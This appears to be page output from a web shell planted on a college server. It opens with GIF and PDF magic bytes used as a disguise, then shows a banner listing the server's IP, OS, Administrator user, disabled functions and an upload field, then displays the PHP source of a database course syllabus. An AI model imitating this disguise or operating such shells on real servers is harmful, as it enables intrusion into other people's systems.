GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/MichaelMalz/CST1602/Syllabus/ |
Upload File : |
<? // JimMartinson/CST1602/Syllabus/CST1602_Syllabus.phpinc ?> <fieldset><legend>Description</legend> CST1602 Advanced Databases (3 credits) <br> This course is designed to introduce students to advanced methods to use and manage database systems. Students will learn how to create and maintain database objects, and how to store, retrieve, and manipulate data. Students will also create procedures and functions that can be shared in multiple forms, reports, and data management applications. <br> (REQUISITES: None) (<?=$class['credits']?> Credits) (<?=$class['credits']?> Lecture, 0 Lab, 0 On the Job Training.) </fieldset> <fieldset><legend>Objectives</legend> <ol class="obj"> <li>Perform database administration tasks using a database management system (DBMS).</li> <li>Distinguish among and create primary key, foreign key, unique, check, and not null constraints.</li> <li>Use the database management system to create, drop, and manage user accounts and privileges.</li> <li>Use the database management system to create and modify databases, tables, procedures, and functions.</li> </ol> </fieldset> <fieldset><legend>Requirements</legend> An average student will spend <?=$class['totalHours']?> hours performing course tasks: <? if ($class['lectureHours'] != 0) { ?><?=$class['lectureHours']?> hours of lecture<?=$lectureHoursPunctuation?><? } ?> <? if ($class['labHours'] != 0) { ?><?=$class['labHours']?> hours working on assigned tasks in the lab<?=$labHoursPunctuation?><? } ?> <? if ($class['lectureHours'] == 0 && $class['labHours'] == 0) { ?>No class hours, <? } ?> <? if ($class['outsideHours'] != 0) { ?><?=$class['outsideHours']?> hours out-of-class<? } ?> . Factual information is provided through informal presentation or in a personalized format. The student is expected to contact the instructor if difficulty is encountered or help is needed. <? if ($class['lectureHours'] != 0 || $class['labHours'] != 0) { ?> Attendance is critical for completion of the lab credits.<? } ?> </fieldset> <fieldset><legend>Grading</legend> Student assignments are translated to a percentage and the percentages to grades. A score of 70% is passing. The following percentage distribution guarantees the following grade: A:93%+, A-:90%+, B+:87%+, B:83%+, B-:80%+, C+:77%+, C:73%+, C-:70%+, F:<70%.<br> <br> For every day late, 10% will be deducted from your score. If you scored a 100%, your grade will be a 90%.<br> If you addend the live class, you will earn 2 extra credit points.<br> If you turn in your assignment more than a day earlier than the due date and time. You will earn 1 extra credit point.<br> </fieldset> <? require('Course/DisabilityNotice.phpinc'); ?>